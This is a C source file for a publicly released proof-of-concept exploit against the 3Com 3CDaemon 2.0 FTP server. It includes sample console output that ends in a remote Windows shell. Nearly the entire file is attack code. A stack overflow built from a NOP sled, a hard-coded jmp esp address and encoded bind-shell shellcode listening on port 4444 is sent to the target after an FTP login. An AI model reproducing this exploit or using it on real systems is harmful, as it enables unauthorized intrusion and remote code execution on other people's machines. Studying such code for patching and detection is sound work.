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/*
3Com Ftp Server remote overflow exploit
author : c0d3r "kaveh razavi" [email protected]
package : 3CDaemon version 2.0 revision 10
advisory : http://secway.org/advisory/ad20041011.txt
company address : 3com.com
it is just a simple PoC tested on winxp sp 1 and may not work on other systems .
just a lame coded software that didnt cost to bother myself to develop
the exploit code . every command has got overflow .
compiled with visual c++ 6 : cl 3com.c
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/*
/*
D:\projects>3com.exe 127.0.0.1 21 c0d3r secret
-------- 3Com Ftp Server remote exploit by c0d3r --------
[*] building overflow string
[*] attacking host 127.0.0.1
[*] packet size = 673 byte
[*] connected
[*] sending username
[*] sending password
[*] exploit sent successfully try nc 127.0.0.1 4444
D:\projects>nc 127.0.0.1 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\3Com\3CDaemon>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define address 0x77A7EE6C // jmp esp lays in shell32.dll in my box
#define size 673 // 3 byte command + 235 byte NOP junk +
// 4 byte return address + 430 byte shellc0de
int main (int argc, char *argv[]){
char shellc0de[] = // some NOPS + shellcode bind port 4444
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x10\x5A\x4A\x33\xC9\x66"
"\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";
unsigned char *recvbuf,*user,*pass;
unsigned int rc,addr,sock,rc2 ;
struct sockaddr_in tcp;
struct hostent *hp;
WSADATA wsaData;
char buffer[size];
unsigned short port;
char *ptr;
long *addr_ptr;
int NOP_LEN = 200,i,x=0,f = 200;
if(argc < 5) {
printf("\n-------- 3Com Ftp Server remote exploit by c0d3r --------\n");
printf("-------- usage : 3com.exe host port user pass --------\n");
printf("-------- eg: 3com.exe 127.0.0.1 21 c0d3r secret --------\n\n");
exit(-1) ;
}
printf("\n-------- 3Com Ftp Server remote exploit by c0d3r --------\n\n");
recvbuf = malloc(256);
memset(recvbuf,0,256);
//Creating exploit code
printf("[*] building overflow string");
memset(buffer,0,size);
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0;i < size;i+=4){
*(addr_ptr++) = address;
}
buffer[0] = 'C';buffer[1] = 'D';buffer[2] = ' ';
for(i = 3;i != 235;i++){
buffer[i] = 0x90;
}
i = 239;
for(x = 0;x != strlen(shellc0de);x++,i++){
buffer[i] = shellc0de[x];
}
buffer[size] = 0;
//EO exploit code
user = malloc(256);
memset(user,0,256);
pass = malloc(256);
memset(pass,0,256);
sprintf(user,"user %s\r\n",argv[3]);
sprintf(pass,"pass %s\r\n",argv[4]);
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("[-] WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("[-] unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("[-] socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;
if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
port=atoi(argv[2]);
tcp.sin_port=htons(port);
printf("\n[*] attacking host %s\n" , argv[1]) ;
Sleep(1000);
printf("[*] packet size = %d byte\n" , sizeof(buffer));
rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{
Sleep(1000) ;
printf("[*] connected\n") ;
rc2=recv(sock,recvbuf,256,0);
printf("[*] sending username\n");
send(sock,user,strlen(user),0);
send(sock,'\n',1,0);
printf("[*] sending password\n");
Sleep(1000);
send(sock,pass,strlen(pass),0);
send(sock,buffer,strlen(buffer),0);
send(sock,'\n',1,0);
printf("[*] exploit sent successfully try nc %s 4444\n" , argv[1]);
}
else {
printf("[-] 3CDaemon is not listening .... \n");
}
shutdown(sock,1);
closesocket(sock);
}
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